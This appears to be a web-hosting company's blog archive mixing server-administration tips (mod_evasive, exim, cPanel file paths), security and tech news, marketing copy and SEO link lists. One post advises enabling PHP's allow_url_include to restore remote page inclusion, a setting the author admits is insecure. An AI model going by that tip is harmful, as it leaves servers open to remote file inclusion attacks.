mod_evasive is an evasive maneuvers module for Apache to provide evasive action in the event of an HTTP DoS or DDoS attack or brute force attack. It is also designed to be a detection and network management tool, and can be easily configured to talk to ipchains, firewalls, routers, and etcetera. mod_evasive presently reports abuses via email and syslog facilities.

Detection is performed by creating an internal dynamic hash table of IP Addresses and URIs, and denying any single IP address from any of the following:
* Requesting the same page more than a few times per second
* Making more than 50 concurrent requests on the same child per second
* Making any requests while temporarily blacklisted (on a blocking list) 

This method has worked well in both single-server script attacks as well as distributed attacks, but just 
like other evasive tools, is only as useful to the point of bandwidth and processor consumption (e.g. the amount of bandwidth and processor required to receive/process/respond to invalid requests), which is why it’s a good idea to integrate this with your firewalls and routers for maximum protection.

This module instantiates for each listener individually and therefore has a built-in cleanup mechanism and scaling capabilities. Because of this per-child design, legitimate requests are never compromised (even from proxies and NAT addresses) but only scripted attacks. Even a user repeatedly clicking on ‘reload’ should not be affected 
Unless they do it maliciously. mod_evasive is fully tweak able through the Apache configuration file, easy to 
Incorporate into your web server, and easy to use.

— Comments:
This is a module I have in fact used with Apache before it honestly can get annoying if you configure it incorrectly 

because you will be simply visiting the website and get banned.

—
Download/Install Tutorial

http://www.webhostingtalk.com/showthread.php?t=616368

Aggregation:

Managed Web Hosting

Hope you learned something, and benefited your server..

Have a good day!

I’ve recently upgraded Apache and PHP on my VPS, and one of the unpleasant surprises was that some scripts which tried including pages from remote sites (I know, not the most secure approach, but there were reasons for that) got broken.

allow_url_fopen

Traditionally, all the websites Google finds suggest that you double-check that your php.ini config has the allow_url_fopen enabled:

allow_url_fopen = On

Well, in my case it was enabled, but scripts were still broken. The really weird thing was that the upgrade procedure didn’t include changing the php.ini in any way, so it was fully working before and I kind of expected it to continue working.

allow_url_include

After some quick research, I’ve found out that PHP 5.1 introduced a new security option to accompany the allow_url_fope, and this was exactly the option which broke my scripts:

allow_url_include = On

PHP 5.1 , by default is allow_url_include = off ! – Turn this to On and Bingo!

There you have it, hope it helps you next time you come across this problem!

Microsoft have announced $250,000 reward to anyone who can give them information that will allow the law enforcement bodies to arrest and convict the person who is responsible for creating the Conficker Internet worm. The virus infected millions of PCs.

Microsoft told IT media that the worm constitutes a “criminal attack”. Residents of any country are eligible for the reward and should contact their international law enforcement authorities, the company said in a statement.

The Windows producer partners with security companies, domain name providers, and others companies to coordinated its response to the worm, also known as Downadup.

Among organizations involved into the pursuit are Internet Corporation for Assigned Names and Numbers (ICANN), VeriSign, NeuStar, CNNIC, Afilias, Public Internet Registry, Global Domains International, M1D Global, AOL, Symantec, F-Secure, ISC, Georgia Tech, the Shadowserver Foundation, Arbor Networks, and Support Intelligence.

The worm is active since 2008. It spreads through a hole in Windows OS and exploits a vulnerability that Microsoft patched in October 2008.

It also spreads via devices like USB drives, and network shares by guessing passwords and usernames.

“The worm seeks to update itself by using a long list of pseudo-randomly generated domain names to contact over HTTP and then grab new code”, said Jose Nazario, manager of security research for Arbor Networks. According to him the algorithm for this domain name generation scheme has been cracked (by F-Secure and others) and has been used to pre-compute the names for pre-registration to prevent hostile parties from using this update feature. This has been facilitated – greatly facilitated – by ICANN, TLD operators, and various registrars working together with Microsoft and others to identify the names and grab the ones they need to. These records can then be pointed at sinkholes to discover Conficker-infected hosts checking in.

Symantec has announced that within the last 25 days it observed an average of 453,436 IP addresses infected per day with W32.Downadup.A and 1.7 million IP addresses infected per day with W32.Downadup.B, the company said in a blog posting.

Infected machines from the worm are estimated to be around as 12 million. The could be used for a launch of distributed denial-of-service attacks on web servers or for a seeding a new worm.

Source: http://www.usatoday.com/tech/products/services/2008-04-01-carbonite_N.htm

Carbonite to offer online backup solutions

Carbonite gets personal about backing up PC files

“We clearly had to change the way people back up their data,” says Friend, CEO of online backup service Carbonite. The start-up launched in 2006 and now has about 250,000 subscribers.

In an age when more parts of our lives are digitized, Carbonite pitches itself to consumers as a safer alternative to external hard drives and CD and DVD data discs, which can be lost or destroyed in a fire, flood or other natural disaster. If your data are backed up offsite, you can recover it.

Carbonite offers unlimited storage for $49.95 a year. Most competitors charge by the gigabyte. With Carbonite, you download software that automatically searches your hard drive and backs up your data in the background.

Carbonite and competitors including Mozy, Xdrive and ADrive differ from online image sharing and backup sites such as Phanfare and SmugMug in that you can store any kind of file — from large uncompressed photo files known as RAW to financial records, music and text documents.

To promote the company, Friend has spent $10 million dollars on a talk-radio ad campaign in the last year. Hosts including Howard Stern, Rush Limbaugh, Bill O’Reilly and techie fave Leo Laporte talk up the virtues of online backup just like Arthur Godfrey used to talk about Lipton tea back in the glory days of radio.

An unusual venue

Analyst Adam Couture at market tracker Gartner says the strategy helps differentiate Carbonite in a cluttered marketplace. “It’s unusual to hear tech companies discussed on talk radio,” says Couture.

Friend says he chose radio for its personal nature. He knew trust would be a big issue for a start-up data-storage service aimed at consumers. “Who is Carbonite and why should I trust them with my data? The answer to that was getting endorsements.”

Friend says the radio campaign is working exactly as he hoped. His hosts offer a special discount and code to enter for Carbonite, so he knows exactly where new sales are coming from.

Since launching in May 2006, Carbonite has backed up more than 3 billion files and restored more than 200 million. Its data centers are at its home base in Boston, where about 3.2 million terabytes of data are backed up on multiple drives.

Mamush Heayie, who runs BackupReview.info, rates Carbonite as the best online backup service for its “speed, reliability and security.”

Still, neophytes may be surprised at how long it takes to upload data for storage online. In USA TODAY tests, we began backing up a 100-gigabyte hard drive in October; it was finished by late December.

The typical Carbonite customer does not back up anything close to that amount of data. Even though Carbonite offers unlimited backup, most customers back up only about 18 GB, Friend says.

Carbonite can back up 2 to 3 GB a day. The data move faster when downloaded. Friend says a typical hard drive can be totally recovered within 24 hours.

For security, Friend says, Carbonite’s software encrypts data as you upload, so that hackers wouldn’t get much use of it.

‘Power’ version coming

The service isn’t for everyone. The software is only for Windows (a Mac version is coming in May), and you can back up only the contents of your primary hard drive, not external data. Friend says that will change later this year with a more expensive “power” version that will connect to external drives.

Before he and co-founder Jeff Flowers started Carbonite, they founded five tech companies in the Boston area. The company has raised $27 million from venture-capital firms Menlo Ventures and 3i Group. Friend hopes to take Carbonite public once it reaches 1 million subscribers.

Couture believes the money in online backup isn’t with consumers but the more lucrative business enterprise market, advocated by companies such as Mozy and IBackup. Mozy charges $3.95 per office worker plus 50 cents per gigabyte monthly. IBackup starts at $99.50 for 10 GB of backup a year.

Friend isn’t fazed: “There are millions of consumers out there with computers in the home.”

To sign-up for Online Back for about 4 bucks per month contact:

ParagonHost Managed Internet Services
http://www.ParagonHost.com
(866) 412-HOST

“Home of VIP Hosting”

Fighting spam just got a little easier

Source: http://jamessw.wordpress.com/2008/02/17/mx-trouble-local-remotedomains-in-cpanel/

MX Trouble ( Local & Remotedomains ) In CPanel

Posted on February 17, 2008. Filed under: cPanel / WHM |

Source: http://www.ConfigServer.com 

Why you should use :fail:

There are sound technical reasons that you should only use :fail: and not :blackhole: on a cPanel server running exim. We have conducted quite extensive testing to establish this configuration is best and outline the reasons here.

In general the two different settings both discard email not destined for a POP3 account, an alias or a catchall alias. However, ever since cPanel included theverify = recipient code in the standard cPanel ACL section for exim, the way email is discarded differs with the two methods quite starkly:

• Using :blackhole: email is accepted and received into the server in its entirety. It is then processed through exim and only on delivery is it written to the null device (/dev/null) and silently ignored.
  • This wastes server bandwidth as the email data, or body, of the email is accepted into the server
  • This wastes server resources (CPU, memory and disk I/O) as the email is fully processed by exim before being finally written to /dev/null
  • Because the blackholed email is still processed through the whole of exim before it is finally deleted, if any of the usual checks and routing that any email goes through fails, such email can be placed in the exim mail queue for later reprocessing. This can lead to tens of thousands of blackholed emails accumulating in the exim mail queue which in turn can cause a range of serious server performance and resource problems and will affect the normal and timely delivery of email
  • This actually breaks the SMTP RFC’s because you’re not notifying the sending SMTP server that the email is undelivered, which is a requirement
  • Causes emails that will never be delivered onto the exim mail queue because checks such as sender verification are still carried out when processing such emails and if they cannot complete they will stay on the exim mail queue and repeatedly reprocess the email until it is finally discarded (usually 4+ days). This can cause very large mail queues full of spam which is repeatedly processed causing severe performance degradation
• Using :fail: the email is never accepted into the server. During the initial SMTP negotiation when the senders SMTP server connects to your SMTP server, the sending SMTP server issues a RCPT command notifying your server which email address the email to follow is intended for. Your server then checks whether the recipient email actually exists on your server (a POP3 account, an alias or a catchall alias) and if it does not, it issues an SMTP DENY which terminates the attempt to deliver the email.
  • This saves bandwidth as the email data is never received into your server
  • This saves server resources as the email never has to be processed
  • This complies with the SMTP RFC’s because the sending SMTP server receives the DENY command
  • Your server does not send a bounce message (just the DENY command)
  • Your server does not send anything to the sender of the email (i.e. the address in the From: line)
  • The sending SMTP server is responsible for notifying the original sender

Here is a simple explanation of what happens during the SMTP conversation

• Some other SMTP server connects to your server on port 25 and initiates an SMTP connection (EHLO command)
• Other server then sends a message saying who they’re delivering a message for (MAIL FROM command)
• Other server then sends who the message is for on your server (RCPT command)
• At this point your server then checks whether the email address in the RCPT command can actually be delivered on your server. If you do not have a catchall alias configured to point to an email address (Default Address) and you have it set to :fail: the following happens:
• Your server sends back along the same connection to the sending server “Go away, no-one here” (the DENY command)
• The sender server would then normally tell their user that the attempt to email your server failed. Your server does not send a “bounce” message. As far as your server is concerned, all that has happened is a little SMTP chatter and no email has been received and no bounce sent

Additionally, this is what our Exim Deny ACL does:

• If the sender server tries four email addresses that don’t exist on your server the ACL disconnects the session with the sender server (DROP) and puts the IP address of the sender server into /etc/exim_deny
• If the sender server connects again, the ACL first checks /etc/exim_deny and if it finds the senders IP address there the session is immediately disconnected

http://www.ParagonHost.com 

“Home of VIP Hosting”

Structure Of Cpanel

cPanel is a hosting automation company driven by technology and dedicated to providing the most feature rich, easy to use, practical applications. We are committed to the hosting community and our continued role as a market leader.

cPanel and WebHost Manager (WHM) combine to form a fully featured web hosting control panel system. cPanel and WHM allow you to provide an interface for both your customers and your staff.

The cPanel and WebHost Manager package includes: * cPanel – Domain Owner Control Panel
* WebHost Manager – Server Administration and Reseller Panel
* Webmail Panel – Webmail Access Panel

————————————————————————————————————————————–Directory Structure of Cpanel
=======================

Apache
=======
/usr/local/apache
+ bin- apache binaries are stored here – httpd, apachectl, apxs
+ conf – configuration files – httpd.conf
+ cgi-bin
+ domlogs – domain log files are stored here
+ htdocs
+ include – header files
+ libexec – shared object (.so) files are stored here – libphp4.so,mod_rewrite.so
+ logs – apache logs – access_log, error_log, suexec_log
+ man – apache manual pages
+ proxy -
+ icons -

Init Script :/etc/rc.d/init.d/httpd – apache start script
Cpanel script to restart apache – /scripts/restartsrv_httpd

Exim
=====
Conf : /etc/exim.conf – exim main configuration file
/etc/localdomains – list of domains allowed to relay mail
Log : /var/log/exim_mainlog – incoming/outgoing mails are logged here
/var/log/exim_rejectlog – exim rejected mails are reported here
/var/log/exim_paniclog – exim errors are logged here
Mail queue: /var/spool/exim/input
Cpanel script to restart exim – /scripts/restartsrv_exim
Email forwarders and catchall address file – /etc/valiases/domainname.com
Email filters file – /etc/vfilters/domainname.com
POP user authentication file – /home/username/etc/domainname/passwd
catchall inbox – /home/username/mail/inbox
POP user inbox – /home/username/mail/domainname/popusername/inbox
POP user spambox – /home/username/mail/domainname/popusername/spam
Program : /usr/sbin/exim (suid – -rwsr-xr-x 1 root root )
Init Script: /etc/rc.d/init.d/exim

ProFTPD
========
Program :/usr/sbin/proftpd
Init Script :/etc/rc.d/init.d/proftpd
Conf: /etc/proftpd.conf
Log: /var/log/messages, /var/log/xferlog
FTP accounts file – /etc/proftpd/username – all ftp accounts for the domain are listed here

Pure-FTPD
=========
Program : /usr/sbin/pure-ftpd
Init Script :/etc/rc.d/init.d/pure-ftpd
Conf: /etc/pure-ftpd.conf
Anonymous ftp document root – /etc/pure-ftpd/ip-address

Frontpage Extensions
=================
Program – (Install): /usr/local/frontpage/version5.0/bin/owsadm.exe
Uninstall and then install for re-installations
FP files are found as _vti-bin, _vti-pvt, _vti-cnf, vti-log inside the public_html

Mysql
=======
Program : /usr/bin/mysql
Init Script : /etc/rc.d/init.d/mysql
Conf : /etc/my.cnf, /root/.my.cnf
Data directory – /var/lib/mysql – Where all databases are stored.
Database naming convention – username_dbname (eg: john_sales)
Permissions on databases – drwx 2 mysql mysql
Socket file – /var/lib/mysql/mysql.sock, /tmp/ mysql.sock

SSHD
======
Program :/usr/local/sbin/sshd
Init Script :/etc/rc.d/init.d/sshd
/etc/ssh/sshd_config
Log: /var/log/messages

Perl
====
Program :/usr/bin/perl
Directory :/usr/lib/perl5/5.6.1/

PHP
====

Program :/usr/local/bin/php, /usr/bin/php
ini file: /usr/local/lib/php.ini – apache must be restarted after any change to this file
php can be recomplied using /scripts/easyapache

Named(BIND)
============
Program: /usr/sbin/named
Init Script: /etc/rc.d/init.d/named
/etc/named.conf
db records:/var/named/
/var/log/messages

————————————————————————————————————————————–

Cpanel installation directory structure
=============================
/usr/local/cpanel
+ 3rdparty/ – tools like fantastico, mailman files are located here
+ addons/ – AdvancedGuestBook, phpBB etc
+ base/ – phpmyadmin, squirrelmail, skins, webmail etc
+ bin/ – cpanel binaries
+ cgi-sys/ – cgi files like cgiemail, formmail.cgi, formmail.pl etc
+ logs/ – cpanel access log and error log
+ whostmgr/ – whm related files

WHM related files
===============
/var/cpanel – whm files
+ bandwidth/ – rrd files of domains
+ username.accts – reseller accounts are listed in this files
+ packages – hosting packages are listed here
+ root.accts – root owned domains are listed here
+ suspended – suspended accounts are listed here
+ users/ – cpanel user file – theme, bwlimit, addon, parked, sub-domains all are listed in this files
+ zonetemplates/ – dns zone template files are taken from here

Common CPanel scripts
===================
cpanel/whm Scripts are located in /scripts/
+ addns – add a dns zone
+ addfpmail – Add frontpage mail extensions to all domains without them
+ addfpmail2 -Add frontpage mail extensions to all domains without them
+ addnetmaskips – Add the netmask 255.255.255.0 to all IPs that have no netmask
+ addnobodygrp – Adds the gorup nobody and activates security
+ addpop – add a pop account
+ addservlets – Add JSP support to an account (requires tomcat)
+ addstatus – (Internal use never called by user)
+ adduser – Add a user to the system
+ bandwidth – (OLD)
+ betaexim – Installs the latest version of exim
+ biglogcheck – looks for logs nearing 2 gigabytes in size
+ bsdcryptoinstall – Installs crypto on FreeBSD
+ bsdldconfig – Configures the proper lib directories in FreeBSD
+ bsdpkgpingtest – Tests the connection speed for downloading FreeBSD packages
+ buildbsdexpect – Install expect on FreeBSD
+ builddomainaddr – (OLD)
+ buildeximconf – Rebuilds exim.conf
+ buildpostgrebsd-dev – Installs postgresql on FreeBSD.
+ chcpass – change cpanel passwords
+ easyapache – recompile/upgrade apache and/or php
+ exim4 – reinstall exim and fix permissions
+ fixcommonproblems – fixes most common problems
+ fixfrontpageperm – fixes permission issues with Front Page
+ fixmailman – fixes common mailman issues
+ fixnamed – fixes common named issues
+ fixndc – fixes rndc errors with named
+ fixquotas – fixes quota problems
+ fullhordereset – resets horde database to a fresh one – all previous user data are lost
+ initquotas – initializes quotas
+ installzendopt – installs zend optimizer
+ killacct – terminate an account – make sure you take a backup of the account first
+ mailperm – fixes permission problems with inboxes
+ park – to park a domain
+ pkgacct – used to backup an account
+ restartsrv – restart script for services
+ restorepkg – restores an account from a backup file ( pkgacct file)
+ runlogsnow – update logs of all users
+ runweblogs – update stats for a particular user
+ securetmp – secures /tmp partition with options nosuexec and nosuid
+ suspendacct – suspends an account
+ unsuspendacct – unsuspends a suspended account
+ upcp – updates cpanel to the latest version
+ updatenow – updates the cpanel scripts
+ updateuserdomains – updates userdomain entries

Important cpanel/whm files
====================
/etc/httpd/conf/httpd.conf – apache configuration file
/etc/exim.conf – mail server configuration file
/etc/named.conf – name server (named) configuration file
/etc/proftpd.conf – proftpd server configuration file
/etc/pure-ftpd.conf – pure-ftpd server configuration file
/etc/valiases/domainname – catchall and forwarders are set here
/etc/vfilters/domainname – email filters are set here
/etc/userdomains – all domains are listed here – addons, parked,subdomains along with their usernames
/etc/localdomains – exim related file – all domains should be listed here to be able to send mails
/var/cpanel/users/username – cpanel user file
/var/cpanel/cpanel.config – cpanel configuration file ( Tweak Settings )*
/etc/cpbackup-userskip.conf -
/etc/sysconfig/network – Networking Setup*
/etc/hosts -
/var/spool/exim -
/var/spool/cron -
/etc/resolv.conf – Networking Setup–> Resolver Configuration
/etc/nameserverips – Networking Setup–> Nameserver IPs ( FOr resellers to give their nameservers )
/var/cpanel/resellers – For addpkg, etc permissions for resellers.
/etc/chkserv.d – Main >> Service Configuration >> Service Manager *
/var/run/chkservd – Main >> Server Status >> Service Status *
/var/log/dcpumon – top log process
/root/cpanel3-skel – skel directory. Eg: public_ftp, public_html. (Account Functions–>Skeleton Directory )*
/etc/wwwacct.conf – account creation defaults file in WHM (Basic cPanel/WHM Setup)*
/etc/cpupdate.conf – Update Config *
/etc/cpbackup.conf – Configure Backup*
/etc/clamav.conf – clamav (antivirus configuration file )
/etc/my.cnf – mysql configuration file
/usr/local/Zend/etc/php.ini OR /usr/local/lib/php.ini – php configuration file
/etc/ips – ip addresses on the server (except the shared ip) (IP Functions–>Show IP Address Usage )*
/etc/ipaddrpool – ip addresses which are free
/etc/ips.dnsmaster – name server ips
/var/cpanel/Counters – To get the counter of each users.
/var/cpanel/bandwidth – To get bandwith usage of domain

What is SaaS?

Software-as-a-Service is the provision of a multi-tenant application over the Internet. The SaaS vendor provides a redundant, scaled, distributed architecture and the customer does not pay for the software itself, but rather for using it, with access to the application being via a Web browser.

What areas of infrastructure are organizations choosing SaaS for?

One of the most popular applications to deliver via SaaS has been Web security. SaaS Web security is based on a recurring subscription fee and the cost is directly aligned to the number of users. All of the usual costs associated with maintaining Web security software such as content filters, along with the infrastructure on which it resides, training, security updates etc. are assumed by the SaaS Web Security vendor in exchange for the recurring service fee.

Who are the market leaders in SaaS Web security?

ScanSafe are the market leaders in the provision of SaaS Web security with 40% of the market (IDC). ScanSafe pioneered the SaaS Web security market and have the largest Web dataset in the industry.

I use content filtering – isn’t this enough?

No. This software was originally designed to safeguard web productivity not security. Despite many vendors repositioning themselves the essential flaw remains – “URL filtering suffers a fundamental flaw to be an effective security filter: it does not monitor threats in real-time.”*

In order to protect themselves from zero hour threats and polymorphic malware, organizations need their Web security to provide real-time filtering of all Web content.

Surely SaaS Web security will cause latency for my users?

The ScanSafe network has been designed specifically for Web traffic resulting in zero latency. Performance is independently monitored for uptime and speed of scanning.

How does it work?

Simple and flexible deployment is made possible by ScanSafe proprietary connector technology. It can take you as little as one hour to route your traffic through their scanning infrastructure.

What about mobile users?

ScanSafe Anywhere+ is the world’s first SaaS to allow organizations to protect their mobile employees wherever they are working – at home, at a client office, in an airport lounge or a hotel hotspot.

Is it easy to manage?

ScanCenter, ScanSafe’s Web-based management portal, allows you to administer, monitor and control performance in real-time, no matter where you are. All services are supported 24×7 by a team of dedicated network and support experts.

SaaS is fine for SMB’s but I heard it doesn’t scale well?

SaaS Web security is infinitely scalable, allowing you to add new users instantly at fixed cost. Resiliency is built in, saving you the costs of planned or unplanned downtime.

SaaS is usually too expensive over time isn’t it?

No. With no hardware or software to maintain or update, ScanSafe SaaS Web security allows your valuable IT resource to focus on projects that add to your bottom line. Our customers typically experience a 30-40% reduction in TCO. The service is delivered at a fixed annual cost which allows confident IT budgeting. The latest Web threat is impossible to predict, but your costs needn’t be.

Hello Viewers,

I would like to take this opportunity to let you kow that at www.technicalcontact.biz we provide huge amount of space and bandwidth you will ever need for your business.

Feel free to explore the website http://hosting.technicalcontact.biz to know the features and email sales@technicalcontact.biz in order to get a free hosting account for one month without submitting a credit card.

What have you got to lose, try and see for yourself. Our services talk about themselves.

TC Admin

meebo Debuts the “meebo extension for Firefox” – IM and Browser United as One!

Source: http://www.meebo.com/press/releases/20071022/

October 22, 2007 – Mountain View, CA

Who: meebo, a website for instant messaging
What: meebo Debuts the “meebo extension for Firefox” — IM and Browser United as One!
When: Monday, October 22, 2007, 9:00 PM PST

Background:
meebo, a website for instant messaging (IM), today announced the “meebo extension for Firefox,” a lightweight add-on to the Open Source browser that greatly enhances the Firefox experience for meebo and Firefox fans, new and old. The “meebo extension for Firefox” deeply integrates the IM experience into the Web browser, providing all of the benefits of instant messaging with several added features. The add-on was released to the Firefox community just last Wednesday and already has over 12,000 installations.

With one click, Firefox users can incorporate core features of meebo, including easy access to IM buddies on AIM, Yahoo!, MSN, GTalk, ICQ, and Jabber, as well as new features like automatic sign-on and link sharing, entirely within the Firefox framework.

A first for Web-based instant messaging, meebo is debuting “meebo alerts” to enable true visual notification when a message arrives, a contact comes online or goes offline, and when receiving chat invitations/new buddy requests. Alerts are the second “first” for the company in less than a month –meebo released seamless user-to-user file transfer in September.

“meebo is so excited to release our first crack at an integrated communications experience for meebo and Firefox users,” said Seth Sternberg, founder and CEO, meebo. “We worked really hard on this, so please let us know what you think!”

The meebo Extension for Firefox:

– Supports all networks: access all your buddies on AIM, Yahoo!, MSN, GTalk, ICQ, and Jabber!

– Smart buddy list: see your most recent messages in the optional sidebar while you browse the web

– Automatic sign-on: automatically sign on to your IM accounts when you launch your browser

– Alerts: get notified when your friends send you an IM so you’ll never miss it

– Share links: drag images and links right onto your sidebar buddylist

The meebo Extension for Firefox closely follows the announcement of an iPhone-optimized edition of meebo — and therefore marks the company’s second major platform innovation in less than two months. The release also coincides with an extended period of rapid usage growth for meebo. According to Nielsen/NetRatings, meebo is the fastest-growing IM destination in the US — ahead of Google Talk (GOOG) and Skype Messenger (EBAY).

Visit https://addons.mozilla.org/en-US/firefox/addon/5700
today to “get foxy” with meebo.

Author: Marketing Spot         

Directories:

More directories:

http://www.samsdirectory.com/submit.php?c=173

http://www.scfenghe.com/submit.php

http://www.crazyleafdesign.com/webdirectory/submit.php?c=52

http://dir.searchramp.com/addurl.asp

http://www.searchenginedog.com (family safe directory)

Submit your blog:

http://www.blogcatalog.com/blogs/submit_blog.html
http://www.globeofblogs.com/register.php
http://blogstreet.com/bsibin/add.cgi
http://www.blogarama.com/add-a-site/
http://www.readablog.com/AddFeed.aspx
http://www.blogdigger.com/add.jsp
http://portal.eatonweb.com/register/ (quick sign up first)
http://blo.gs/ping.php
http://www.hirank.com/semantic-indexing-project/census/index.html
http://www.britblog.com/register/index.php
http://www.bloogz.com/man_en/add_your_url.php
http://boingboing.net/suggest.html
http://www.sarthak.net/blogz/add.php
http://www.blogpulse.com/submit.html
http://www.blog-search.com/blog-submission.html (quick sign up first)
http://www.blogflux.com/add.php (quick sign up first)
http://blogintro.com/submit/
http://findingblog.com/add_blog.php?cat=
http://www.iblogbusiness.com/add.html (business only)
http://www.blogburst.com/blogger/join.html
http://www.rss-network.com/submitrss.php
http://www.daypop.com/info/submit.htm
http://www.postami.com/rss.finder/submit_feed.php
http://www.2rss.com/index.php
http://www.feedsee.com/submit.html
http://www.feedsfarm.com/a.html
http://www.rssfeeds.com/suggest_wizzard.php
http://www.search4rss.com/?add=default
http://www.feeds4all.com/NewFeed.aspx
http://www.plazoo.com/en/addrss.asp
http://www.feed24.com/?c=add
http://feeds2read.net/Suggest-A-Feed
http://www.jordomedia.com/RSS/l_op=Addrss.html (3 steps)
http://www.nfeeds.com/submit.php
http://free-rss.page2go2.com/rss-add.html
http://www.feedooyoo.com/ref.htm
http://www.goldenfeed.com/AddFeed.aspx
http://www.rssmicro.com/?m=fs#theForm
http://www.feeddirectory.us/directory/submitrss.php
http://www.octora.com/add_rss.php
http://www.rssmotron.com/feed_submission.php
http://www.feedbase.net/Add.php
http://www.morenews.be/voegbrontoe.php
http://www.daytimenews.com/submit-rss-feed.aspx
http://www.rssbuffet.com/submit.php

Article Submission:

http://ezinearticles.com/?Lanier-Exotic-Wood-Pens—Certified-Collectors-Items&id=803812

http://www.articlesnatch.com/Article/Lanier-Exotic-Wood-Pens—Certified-Collector-s-Items/240266

http://www.articlebliss.com/Article/Lanier-Exotic-Wood-Pens—Certified-Collector-s-Items/164435

http://www.articlesnatch.com/Article/Handcrafted-wood-pens—the-best-giveaway-items/240670

http://www.featured-articles.com/business/handcrafted-wood-pens-the-best-giveaway-items.html

http://www.articlesbase.com/business-articles/handcrafted-wood-pens-the-best-giveaway-items-247556.html

http://ezinearticles.com/?Handcrafted-Wooden-Pens-Help-Businesses-Grow&id=807913

http://www.featured-articles.com/business/handcrafted-wooden-pens-help-businesses-grow.html

http://www.articlesnatch.com/Article/Handcrafted-wooden-pens-help-businesses-grow/240740

http://ezinearticles.com/?Give-One-Of-a-Kind-Gifts-With-Custom-Wood-Pens&id=808116

http://www.featured-articles.com/business/give-one-of-a-kind-gifts-with-custom-wood-pens.html

http://www.articlesnatch.com/Article/Give-one-of-a-kind-gifts-with-custom-wood-pens/241301

Bookmark submission:

1. Digg - community based web 2.0 social network which combine social bookmarking and news share. Provides extremely hight traffic for popular sites.
2. Delicious - social bookmarking service to share and discover links to useful resources.
3. Furl - social network created by Looksmart. Allow users to bookmark pages using toolbar.
4. Reddit - website where users can post links to content on the web.
5. MyBlogLog - Yahoo owned social network for bloggers and webmasters.
6. Simpy - old social bookmarking and tagging network.
7. StumbleUpon - one of the most popular network which allow users to share their web discoveries. Provides extremely high traffic.
8. Magnolia - network to create groups, discover, and discuss bookmarked links.
9. Blogdune - social site for bloggers to create profiles and find friends.
10. BlogCatalog - social site for bloggers to submit weblogs, discuss information, and find friends.
11. SpicyPage - community which allow to submit and rate news / blog posts.
12. Outpost-Earth - RSS feed submission network.
13. 9Rules - share, learn, and discover information.
14. Plime - social bookmarking network.
15. IndianPad - the most popular Indian web 2.0 social site which provides incredible traffic.
16. NewsClowd - social site which gives visitor a chance to discover and share news.
17. Mixx - similar to Digg network with little different features.
18. LinkInn - social bookmarking site and community.
19. Facebook - portal for student. Allow to share links with friends.
20. EarthFrisk - site to find friends in blogosphere and share information.
21. Technorati - popular web 2.0 blog search engine, news provider, and community for bloggers.
22. BumpZee - site to submit RSS feeds for interested topics.
23. Zimbio - Web 2.0 media network which combine rss feed submission, blog submission, article submission, discussions etc…
24. Searchles - social site to search popular links.
25. Squidoo - allow members to create a Lens (personal pages) to share information.
26. Genwi - online community to submit a website or blog.
27. Hugg - another network which are similar to digg.
28. Blogoria - newest social / web 2.0 community for bloggers.
29. Sk-rt - site to share interesting links and information.
30. Stirrdup - newest social bookmarking network.
31. NewsVine - news / media social site which doesn’t allow to submit links to websites user own.
32. Blo.gs - ping service for blogs and websites with RSS feeds.
33. OthersOnline - community for bloggers to create profiles and submit blogs.
34. MyFeedz - RSS feed submission network which provides latest news.
35. Explodeus - community based website to read popular posts and articles.
36. Propeller - social site to read popular news and opinion.
37. MetaFilter - blog which are running by community. Allow members to submit blog posts.
38. I-Am-Bored - one of the oldest social network.
39. ShoutWire - similar to Digg and Reddit network which gives members a chance to rate stories in positive and negative mood.

Dynamsoft Issue Tracking Anywhere Hosted Resolves Organization Issues at ParagonHost

Source: http://www.paragonhost.com/community/index.php/topic,11.msg14.html#msg14

Download Case Study here:

http://www.paragonhost.com/casestudies/dynamsoft/casestudy.pdf

See Case Study at DynamSoft here:

http://www.dynamsoft.com/Products/bug-tracking-issue-tracking-anywhere.aspx

World Class Internet Service provider ParagonHost
empowers businesses to reach new profits, markets
and success via their Web sites. ParagonHost’s
primary service offerings include: Managed Web
Hosting, E-Mail Hosting and Security, Web Design
and Development, Spam Filtering, Internet Filtering,
Domain Registration and Merchant Services.

ParagonHost has approximately 2000 clients including
Harvard Eye, Long Beach Laser, and Saddleback
Memorial Medical Center’s project “Dancing to
a new beat”. ParagonHost also caters to clients that
help the community such as Spencer Recovery
Centers, a national client that provides drug rehabilitation
and alcohol treatment. In addition, Paragon-
Host donates hosting services to charities such as
Surfers Healing, an initiative where surfers help children
with Autism. With a focus on quality, performance,
and security, ParagonHost provides
resources for clients that are looking for true value in
web hosting and managed Internet Services.

Business Challenge

As ParagonHost started growing, the company’s
needs also grew. Therefore, as they moved forward
with new projects, a decision was made to be more
organized with their collection of data. Although
there was no formal system in place, the team
had been relying on non-managed knowledge
pools and weekly project meetings to stay organized.
They needed a centralized knowledge
pool. Dave Safley, Founder and CTO at ParagonHost
explained, “We needed a solution
where we could take all of the different knowledge
pools that we might have in separate
places and put it into one location.”

One requirement stemmed from having a distributed
development team. “It is pretty imperative
that we have the capability of running on systems
no matter where somebody may be; whether
they are on the west coast in California, on the
east coast in New York, or one of our outsourced
developers from around the world,” commented
Safley. “And therefore, remote capability with full
functionality was really important to us.” A webbased
tracking system was necessary in order to
fulfill this requirement.

“I am always looking for resources that will help
the company do things better and be more organized,”
explained Safley. “At this time, I had been
looking for knowledge bases and very robust databases with extensive search abilities.” A
Google search led him to Dynamsoft’s website where he found both Issue Tracking Anywhere
and SourceAnywhere, a version control tool. “I came across the products that I
needed and it was a stroke of luck that both of these products were created by the same
company,” remarked Safley.

The fact that Issue Tracking Anywhere, as well as SourceAnywhere, had the option of
being delivered as a hosted application helped seal the deal for ParagonHost. Safley
explained, “We will often look for a good company that has Enterprise Level hosted services.
We have enough to be concerned about with our own internal structure so we
appreciated the fact that Dynamsoft offers a hosted solution.”

As with most hosted applications, companies have concerns about security and Paragon
Host was no exception. “We always take security as a concern,” stated Safley. “But after
looking at Dynamsoft’s history and how long the company has been providing these types
of solutions, it gave me the warm and fuzzy feeling to know that it would be safe. And I also
looked at data infrastructure. The Bell data centre that Dynamsoft has chosen made us feel
comfortable moving forward with the hosted services.”

Dynamsoft Issue Tracking Anywhere™ Hosted is a web-based issue tracking system
designed for issue/work item tracking, bug/defect tracking, customer support and project
management. With an easy-to-use and intuitive interface, Issue Tracking Anywhere is convenient,
effective and professional in tracking and managing both business and technical
issues. It is available in both standalone and hosted environments.
 

“We were able to start using Issue Tracking Anywhere within a week and found the transition
to be quite comfortable,” observed Safley. “Most of the functions seemed to be very
user friendly to a developer and/or anyone that is actually involved in technology or
Windows-based functionality.”

